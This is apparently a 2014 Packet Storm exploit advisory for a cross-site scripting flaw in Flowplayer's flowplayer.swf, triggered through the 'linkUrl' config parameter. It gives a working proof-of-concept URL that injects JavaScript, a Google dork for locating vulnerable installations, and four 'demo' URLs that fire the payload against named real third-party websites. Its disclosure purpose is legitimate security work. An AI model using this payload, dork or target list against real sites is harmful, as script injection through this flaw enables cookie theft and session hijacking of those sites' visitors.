Flowplayer Cross Site Scripting

2014-05-16T00:00:00
ID PACKETSTORM:126646
Type packetstorm
Reporter Muhammad Adeel
Modified 2014-05-16T00:00:00

Description

                                        
                                            `# Flowplayer (js & swf) XSS Vulnerability  
# Date: 15/5/14  
# Vulnerablity Risk : High  
# Vulnerable Sofware: http://flowplayer.org/  
# Dork : inurl:flowplayer/flowplayer.swf  
# Author: Muhammad Adeel aka Innoxent Stoker  
# Founder | Urdusecurity.blogspot.com  
  
# Vulnerability  
  
xss is Cross Site Scripting vuln Which actually interacts With Either  
WebServer or The Clients and its Highly Dangrous Vuln Because it May Lead  
to Data Stealing and Other Stuff Like That.  
  
# POC & Exploit  
  
xss is in flowplayer.swf Config Command Which is Executing xss while Giving  
"linkUrl" ParaMeter  
  
  
http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"  
http://stream.flowplayer.org/bauhaus/624x260.mp4",  
"linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf  
  
  
# Demo  
  
http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={  
"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",  
"linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80,  
111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101,  
101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32,  
83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101,  
99));"}}&.swf  
  
  
http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf  
  
  
http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf  
  
  
https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf  
`